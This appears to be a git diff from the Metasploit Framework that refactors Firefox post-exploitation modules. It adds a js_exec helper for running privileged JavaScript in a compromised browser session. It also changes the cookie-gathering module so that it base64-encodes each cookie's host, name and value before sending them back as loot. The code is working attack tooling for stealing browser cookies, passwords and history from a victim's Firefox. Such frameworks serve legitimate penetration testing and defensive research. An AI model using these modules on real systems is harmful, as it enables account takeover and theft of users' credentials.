diff --git a/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb b/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb index b03172c234..b36e245414 100644 --- a/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb +++ b/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb @@ -9,7 +9,17 @@ module Msf module Exploit::Remote::FirefoxPrivilegeEscalation - + + # Sends the +js+ code to the remote session, which executes it in Firefox's + # privileged javascript context + # @return [String] the results that were sent back. This can be achieved through + # calling the "send" function, or by just returning the value in +js+ + def js_exec(js) + print_status "Running the privileged javascript..." + session.shell_write("[JAVASCRIPT]#{js}[/JAVASCRIPT]") + session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT']) + end + # Puts the shellcode into memory, adds X flag, and calls it # The js function throws on error # @return [String] javascript code containing the execShellcode() javascript fn diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb index 40c5461117..1ebd1204d8 100644 --- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb +++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb @@ -117,4 +117,4 @@ class Metasploit3 < Msf::Exploit::Remote def html "" end -end +end \ No newline at end of file diff --git a/modules/post/firefox/gather/cookies.rb b/modules/post/firefox/gather/cookies.rb index ce6c5a69e7..18cefbef6f 100644 --- a/modules/post/firefox/gather/cookies.rb +++ b/modules/post/firefox/gather/cookies.rb @@ -5,11 +5,9 @@ require 'json' require 'msf/core' -require 'msf/core/payload/firefox' class Metasploit3 < Msf::Post - include Msf::Payload::Firefox include Msf::Exploit::Remote::FirefoxPrivilegeEscalation def initialize(info={}) @@ -29,12 +27,14 @@ class Metasploit3 < Msf::Post end def run - print_status "Running the privileged javascript..." - session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]") - results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT']) + results = js_exec(js_payload) if results.present? begin cookies = JSON.parse(results) + cookies.each do |entry| + entry.keys.each { |k| entry[k] = Rex::Text.decode_base64(entry[k]) } + end + file = store_loot("firefox.cookies.json", "text/json", rhost, results) print_good("Saved #{cookies.length} cookies to #{file}") rescue JSON::ParserError => e @@ -47,6 +47,7 @@ class Metasploit3 < Msf::Post %Q| (function(send){ try { + var b64 = Components.utils.import("resource://gre/modules/Services.jsm").btoa; var cookieManager = Components.classes["@mozilla.org/cookiemanager;1"] .getService(Components.interfaces.nsICookieManager); var cookies = []; @@ -54,7 +55,7 @@ class Metasploit3 < Msf::Post while (iter.hasMoreElements()){ var cookie = iter.getNext(); if (cookie instanceof Components.interfaces.nsICookie){ - cookies.push({host:cookie.host, name:cookie.name, value:cookie.value}) + cookies.push({host:b64(cookie.host), name:b64(cookie.name), value:b64(cookie.value)}) } } send(JSON.stringify(cookies)); diff --git a/modules/post/firefox/gather/history.rb b/modules/post/firefox/gather/history.rb index 75808963c0..1db4ed7993 100644 --- a/modules/post/firefox/gather/history.rb +++ b/modules/post/firefox/gather/history.rb @@ -5,11 +5,9 @@ require 'json' require 'msf/core' -require 'msf/core/payload/firefox' class Metasploit3 < Msf::Post - include Msf::Payload::Firefox include Msf::Exploit::Remote::FirefoxPrivilegeEscalation def initialize(info={}) @@ -30,9 +28,7 @@ class Metasploit3 < Msf::Post end def run - print_status "Running the privileged javascript..." - session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]") - results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT']) + results = js_exec(js_payload) if results.present? begin history = JSON.parse(results) diff --git a/modules/post/firefox/gather/passwords.rb b/modules/post/firefox/gather/passwords.rb index d3db014177..24130d0f4e 100644 --- a/modules/post/firefox/gather/passwords.rb +++ b/modules/post/firefox/gather/passwords.rb @@ -29,9 +29,7 @@ class Metasploit3 < Msf::Post end def run - print_status "Running the privileged javascript..." - session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]") - results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT']) + results = js_exec(js_payload) if results.present? begin passwords = JSON.parse(results) diff --git a/modules/post/firefox/gather/xss.rb b/modules/post/firefox/gather/xss.rb index 4d2e960e69..63049a2a7b 100644 --- a/modules/post/firefox/gather/xss.rb +++ b/modules/post/firefox/gather/xss.rb @@ -10,6 +10,7 @@ require 'msf/core/payload/firefox' class Metasploit3 < Msf::Post include Msf::Payload::Firefox + include Msf::Exploit::Remote::FirefoxPrivilegeEscalation def initialize(info={}) super(update_info(info, @@ -36,9 +37,7 @@ class Metasploit3 < Msf::Post end def run - session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]") - results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT']) - + results = js_exec(js_payload) if results.present? print_good results else